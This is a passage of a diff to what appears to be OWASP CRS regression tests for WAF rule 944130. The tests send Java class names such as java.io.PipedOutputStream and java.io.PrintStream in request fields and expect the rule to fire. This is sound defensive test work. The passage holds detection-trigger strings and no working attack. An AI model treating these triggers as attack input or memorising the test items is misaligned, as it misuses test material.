"java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-207 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 207 desc: "Content-Type text/plain includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-208 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 208 desc: "Content-Type application/json arg value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PipedOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-209 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PipedOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 209 desc: "Content-Type application/json arg name includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PipedOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-210 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PipedOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 210 desc: "Argument test includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - 
headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-211 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_id: 211 desc: "Argument name includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-212 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedReader=test" + output: + 
log_contains: "id \"944130\"" + - test_id: 212 desc: "Cookie test includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PipedReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-213 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 213 desc: "Cookie name includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PipedReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-214 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 214 desc: "Request header test includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PipedReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-215 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 215 desc: "XML attribute value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-216 + - input: + dest_addr: "127.0.0.1" 
+ port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 216 desc: "XML element value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-217 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_id: 217 desc: "Nested XML element value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedReader" - output: - log_contains: 
"id \"944130\"" - - test_title: 944130-218 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_id: 218 desc: "Content-Type text/plain includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-219 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_id: 219 desc: "Content-Type application/json arg value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - 
method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PipedReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-220 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PipedReader\"}" + output: + log_contains: "id \"944130\"" + - test_id: 220 desc: "Content-Type application/json arg name includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PipedReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-221 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PipedReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 221 desc: "Argument test includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-222 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_id: 222 desc: "Argument name includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PrintStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-223 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PrintStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 223 desc: "Cookie test includes keyword 
java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PrintStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-224 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PrintStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 224 desc: "Cookie name includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PrintStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-225 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + Cookie: java.io.PrintStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 225 desc: "Request header test includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PrintStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-226 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PrintStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 226 desc: "XML attribute value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-227 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 227 desc: "XML element value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-228 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_id: 228 desc: "Nested XML element value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-229 + - input: + dest_addr: "127.0.0.1" + 
port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_id: 229 desc: "Content-Type text/plain includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-230 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_id: 230 desc: "Content-Type application/json arg value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": 
\"java.io.PrintStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-231 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PrintStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 231 desc: "Content-Type application/json arg name includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PrintStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-232 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PrintStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 232 desc: "Argument test includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-233 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 233 desc: "Argument name includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-234 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 234 desc: "Cookie test includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - 
